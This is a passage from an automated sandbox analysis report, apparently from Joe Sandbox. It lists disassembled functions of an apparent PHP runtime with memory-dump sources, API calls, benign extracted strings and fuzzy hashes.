                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort$AdjustPointer
                                                • String ID:
                                                • API String ID: 1501936508-0
                                                • Opcode ID: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
                                                • Instruction ID: 241caae712970f75e3c1c9cd5adc62efc0acb62da631b1025390f39233bbd73c
                                                • Opcode Fuzzy Hash: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
                                                • Instruction Fuzzy Hash: 7251AB7AB4DF42D1EA659BA2944467C62A6BF46FE0F0940F7DA4D067B5DE3CE482C300
                                                Function 00007FFE1A5229FC Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort$AdjustPointer
                                                • String ID:
                                                • API String ID: 1501936508-0
                                                • Opcode ID: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
                                                • Instruction ID: d3ff09a3401612fad7d4e6f73e8668af2596c25b7395d74f60401984b4e0e494
                                                • Opcode Fuzzy Hash: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
                                                • Instruction Fuzzy Hash: AD519E26B0EF42C1EA658F93944467C63A6AF46FE0B0984F7DA4D06BA4DF7CE4428310
                                                Function 00007FF7498C8610 Relevance: 12.1, APIs: 8, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __intrinsic_setjmp_efree@@8virtual_chdirvirtual_getcwdzend_destroy_file_handlezend_execute_scriptszend_stream_init_filenamezval_ptr_dtor
                                                • String ID:
                                                • API String ID: 4082177501-0
                                                • Opcode ID: 9886735fd19537ddcc64757c30396f091716d4bdd422e183795669e6344f89ca
                                                • Instruction ID: 35ba34a1cc1831483321df346db4e804a43572638407ba27d2fe8b4930bd8d10
                                                • Opcode Fuzzy Hash: 9886735fd19537ddcc64757c30396f091716d4bdd422e183795669e6344f89ca
                                                • Instruction Fuzzy Hash: 67413C36608B85D9EB21FF29D8502E977B4FB58B88F848032DA4E47758DF38E559C710
                                                Function 00007FFE1A5257C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: FileHeader_local_unwind
                                                • String ID: MOC$RCC$csm$csm
                                                • API String ID: 2627209546-1441736206
                                                • Opcode ID: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
                                                • Instruction ID: d45995bf7c5bd6b8427faeb890c8fa61775ecc677fad3825a394def6521a80df
                                                • Opcode Fuzzy Hash: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
                                                • Instruction Fuzzy Hash: 67517FB2B4DA42C6EB609BA6904137D26A2FF46FB8F1410F3DA4E566A5CF3CE445C601
                                                Function 00007FFE1A52E51C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: {for
                                                • API String ID: 2943138195-864106941
                                                • Opcode ID: 1d198ef7d00c42b7b5d6345a2de299b4b6d6df6816ee118919713e1a20d08d6c
                                                • Instruction ID: 0b0e24e90d08d12f7cb0697a31e1a35e092360b5fb7136d3962f28436eb117ef
                                                • Opcode Fuzzy Hash: 1d198ef7d00c42b7b5d6345a2de299b4b6d6df6816ee118919713e1a20d08d6c
                                                • Instruction Fuzzy Hash: 635156B2B0CA85A9E7018F66D4813F827A2EB56B58F4080F7EA4C07BA5DF7CE554C340
                                                Function 00007FF7498C9020 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 109COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8zend_hash_index_del@@16
                                                • String ID: %s Closed without sending a request; it was probably just an unused speculative preconnection$%s Closing$%s Invalid request (%s)$Unexpected EOF
                                                • API String ID: 126594957-4231326387
                                                • Opcode ID: f196a74f18a23b67ecf4fefdc62fade8b532747b7616117ed819e3a6f1bdf7ca
                                                • Instruction ID: 9c1d602a20083ef85d2b062f3c225f11b2bcd1f592bc8cef0a3593515795fb95
                                                • Opcode Fuzzy Hash: f196a74f18a23b67ecf4fefdc62fade8b532747b7616117ed819e3a6f1bdf7ca
                                                • Instruction Fuzzy Hash: 1241C122B1CB82C2EB14BF5EE4441BAA379FB84784F844176DB5E47B89DF2DE4618310
                                                Function 00007FFE1A52DB20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: NameName::atol
                                                • String ID: `template-parameter$void
                                                • API String ID: 2130343216-4057429177
                                                • Opcode ID: 99e8a3aeda194b23daaeb8e320394810a7e422b566c05f224998a45ae8f9928a
                                                • Instruction ID: 2989450db3bab62e3afa006d288646c10c80a3f7c6e8fdcf1cdee310f5e2a8ae
                                                • Opcode Fuzzy Hash: 99e8a3aeda194b23daaeb8e320394810a7e422b566c05f224998a45ae8f9928a
                                                • Instruction Fuzzy Hash: 43412922B0CF56C8FB008BA2D8512BD2371BF85BA8F5441B7DE0D67A65DF789545C740
                                                Function 00007FFE1A5288FC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+Replicator::operator[]
                                                • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                • API String ID: 1405650943-2211150622
                                                • Opcode ID: 2d64ae1c8566e52113f7ea7f0519ec7cc2fdd75a0b800f0bfe5adc2fd519a96a
                                                • Instruction ID: 1cf0cf310469407692c57d83767f517bac0008860358f6d8c1fbfddfacc6a94d
                                                • Opcode Fuzzy Hash: 2d64ae1c8566e52113f7ea7f0519ec7cc2fdd75a0b800f0bfe5adc2fd519a96a
                                                • Instruction Fuzzy Hash: 08413AA2B0CF46C8F7128BA6D8402BC37A1BB4AB68F4445F7EA4C12764DF7CA545C311
                                                Function 00007FFE1A52A704 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 80COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: char $int $long $short $unsigned
                                                • API String ID: 2943138195-3894466517
                                                • Opcode ID: d3dd5d4b7b7d9da7287822680feab4e52e9236e75075d12403fdf1d6dd1a2c6b
                                                • Instruction ID: 1dcc1fcff546022d7cfc947553c0085dce3abedaba59e326475b69d91a8a5795
                                                • Opcode Fuzzy Hash: d3dd5d4b7b7d9da7287822680feab4e52e9236e75075d12403fdf1d6dd1a2c6b
                                                • Instruction Fuzzy Hash: 81313B62F1CE46C8F7018B6AD8543BC27B1BB46B68F5881B7CA0C02AA8DF3CA544C750
                                                Function 00007FF7498CBB40 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID: Buffer not contiguous$Not available on this OS$Not initialized correctly$Success$Unknown error code$Windows error code: %lu
                                                • API String ID: 1452528299-4100623288
                                                • Opcode ID: 81c357af6c1408623f29115be5d9cad58a7809e2a75961b1e48677b4cf867a2f
                                                • Instruction ID: 621862ee421575b36c986e17bd28e8d476c5d00890338f32cbfba98d23efcf91
                                                • Opcode Fuzzy Hash: 81c357af6c1408623f29115be5d9cad58a7809e2a75961b1e48677b4cf867a2f
                                                • Instruction Fuzzy Hash: D7F0E779E4DA02D9EA587F1D98A50B4963CBFC5308FC4027AC21D02A75DE1CF6BAC724
                                                Function 00007FF7498C6B40 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                Download Yara Rule
                                                APIs
                                                • zend_strndup@@16.PHP8TS(?,0000000100000001,0000000100000001,00007FF7498C6D74,?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6B66
                                                • php_raw_url_decode.PHP8TS(?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6B88
                                                • memmove.VCRUNTIME140(?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6BDE
                                                • memmove.VCRUNTIME140(?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6C79
                                                • memmove.VCRUNTIME140(?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6CB9
                                                • memmove.VCRUNTIME140(?,?,?,?,0000000100000001,00007FF7498CB8D0), ref: 00007FF7498C6CEF
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: memmove$php_raw_url_decodezend_strndup@@16
                                                • String ID:
                                                • API String ID: 3041052580-0
                                                • Opcode ID: 1f84f3afe3a0470136ba4bb7014c1384d7f273fa477e0fbb74a8c1c596acbfb0
                                                • Instruction ID: d7e417346df807f1e39253a8ff31f9b58f025d9981d142b08c70fd3cf304d95c
                                                • Opcode Fuzzy Hash: 1f84f3afe3a0470136ba4bb7014c1384d7f273fa477e0fbb74a8c1c596acbfb0
                                                • Instruction Fuzzy Hash: 0A51B251A0D7DB85FE217E29D60C278E6B9EB15FD1F988430CA4D07B86CF7DA4628321
                                                Function 00007FFE1A526570 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                • String ID:
                                                • API String ID: 3741236498-0
                                                • Opcode ID: 15fe56e746848034ceae3c74ae24cd98c02c43889dad90caa4cb656d1d360567
                                                • Instruction ID: b7e9943dd18dce4e02c9b1b47a4fbf3beeffe7fbccfae958ed13b44c01cd3b02
                                                • Opcode Fuzzy Hash: 15fe56e746848034ceae3c74ae24cd98c02c43889dad90caa4cb656d1d360567
                                                • Instruction Fuzzy Hash: 6431A122B1DB9180EA118B66A80457923A5FF4AFE4F5946B3DE2D037A0EE3DE442C350
                                                Function 00007FFE1A523AEC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort$CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 2889003569-2084237596
                                                • Opcode ID: 8f0da28b834415bf94a2588a677a7c1d22b03c176692cab6c1aa6134d6a9ba6e
                                                • Instruction ID: e4c58c50d9da9494374e432403a4b4f1002112c543465b739f2966fff10d8f3d
                                                • Opcode Fuzzy Hash: 8f0da28b834415bf94a2588a677a7c1d22b03c176692cab6c1aa6134d6a9ba6e
                                                • Instruction Fuzzy Hash: 8A915173B08B91CAE7108BA6E4402BD77B2FB45BA8F1441A7EA4D17765DF38D195CB00
                                                Function 00007FFE1A52BF40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                • API String ID: 2943138195-757766384
                                                • Opcode ID: a4b8fa5738cb077c0dd1c715c93faa489c025e3a231d02453c6ff42b09dc2204
                                                • Instruction ID: b4c99bdb4f7ebec0067521fdc6a5edbcdfb0de8cfc15ef3ebd6dc14d00f801f3
                                                • Opcode Fuzzy Hash: a4b8fa5738cb077c0dd1c715c93faa489c025e3a231d02453c6ff42b09dc2204
                                                • Instruction Fuzzy Hash: A4715A62B0CE42C4E7148FA699410BC66A2BF46BA4F4445F7DA4D53ABADF3CE650C340
                                                Function 00007FFE1A5238D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: abort$CallEncodePointerTranslator
                                                • String ID: MOC$RCC
                                                • API String ID: 2889003569-2084237596
                                                • Opcode ID: 57666f04986205aaeb6cec4485343161f235cd4bd3cca67b34c3d672c94bd25f
                                                • Instruction ID: f60efc0db9846398ae0b28a6e43da25778c964d5608fe55783c36d48a5481544
                                                • Opcode Fuzzy Hash: 57666f04986205aaeb6cec4485343161f235cd4bd3cca67b34c3d672c94bd25f
                                                • Instruction Fuzzy Hash: 00613C72B08B45CAE7108FA6E4803BD77A1F746BA8F0442A7DA4917BA9CF38E155C700
                                                Function 00007FFE1A52A360 Relevance: 7.6, APIs: 5, Instructions: 93COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: NameName::$Name::operator+
                                                • String ID:
                                                • API String ID: 826178784-0
                                                • Opcode ID: 1d3f62f49c0834609423dd0bd46333a683c0de2f358683d99f687fb4e9606eea
                                                • Instruction ID: 781bbf3c6cf86e0a4caa9bdde03cfcc455807735a30b5793dd08c8bf293225ee
                                                • Opcode Fuzzy Hash: 1d3f62f49c0834609423dd0bd46333a683c0de2f358683d99f687fb4e9606eea
                                                • Instruction Fuzzy Hash: F3416C22B0CF96D4E710CBA2E8900B827A5BB56FA4F5440F7DA4D537A5DF38E405C350
                                                Function 00007FF7498C4610 Relevance: 7.6, APIs: 5, Instructions: 90stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8_emalloc@@8add_assoc_stringl_exmemmovestrchr
                                                • String ID:
                                                • API String ID: 2071373115-0
                                                • Opcode ID: 975caf1fdecc1cffee16fb9dd9b39aa3add76241824c16fb696f2ae4871633f8
                                                • Instruction ID: 83fcae9e1cd7ed2c5a34d2f387ef7c37604f23e830ceda2eb821e73489e557d4
                                                • Opcode Fuzzy Hash: 975caf1fdecc1cffee16fb9dd9b39aa3add76241824c16fb696f2ae4871633f8
                                                • Instruction Fuzzy Hash: B231922261DB85C5EB10BF2994047A8A3B9FB45B94F888531EE6E07798DF3CE492C310
                                                Function 00007FF7498C1400 Relevance: 7.6, APIs: 5, Instructions: 68fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$ferrorfwritephp_handle_aborted_connection
                                                • String ID:
                                                • API String ID: 912128676-0
                                                • Opcode ID: e4b30dbfb457f3f8cd7680fee289e1c88f01ee9ff9a35c9d6d3c961190337abb
                                                • Instruction ID: f61f86ce5ec62708f174af2491d94597bdf69cf151deb04a8da79cba7141c79f
                                                • Opcode Fuzzy Hash: e4b30dbfb457f3f8cd7680fee289e1c88f01ee9ff9a35c9d6d3c961190337abb
                                                • Instruction Fuzzy Hash: 3B215C65B0DB42C1EA50BF1AE884679E375AF49FE0F884135DE5E07BA4DF2CE4648720
                                                Function 00007FF7498C6F00 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                • zend_string_tolower_ex@@16.PHP8TS(?,?,?,?,?,00007FF7498C70C2,?,?,?,00007FF7498CB84F), ref: 00007FF7498C6F31
                                                • zend_hash_add@@24.PHP8TS(?,?,?,?,?,00007FF7498C70C2,?,?,?,00007FF7498CB84F), ref: 00007FF7498C6F49
                                                • zend_hash_add@@24.PHP8TS(?,?,?,?,?,00007FF7498C70C2,?,?,?,00007FF7498CB84F), ref: 00007FF7498C6F5F
                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7498C70C2,?,?,?,00007FF7498CB84F), ref: 00007FF7498C6F73
                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00007FF7498C70C2,?,?,?,00007FF7498CB84F), ref: 00007FF7498C6F88
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: freezend_hash_add@@24$zend_string_tolower_ex@@16
                                                • String ID:
                                                • API String ID: 2958139939-0
                                                • Opcode ID: 1a3cc41a375369cc1e6bbb0b8ef8fa0d64bcbaac8a0b2044f46f0e2bb321514e
                                                • Instruction ID: 03848e358998bed740dadbb7f9e6d4ed4124a58b00d9a9ca03abe4e1ef1d5398
                                                • Opcode Fuzzy Hash: 1a3cc41a375369cc1e6bbb0b8ef8fa0d64bcbaac8a0b2044f46f0e2bb321514e
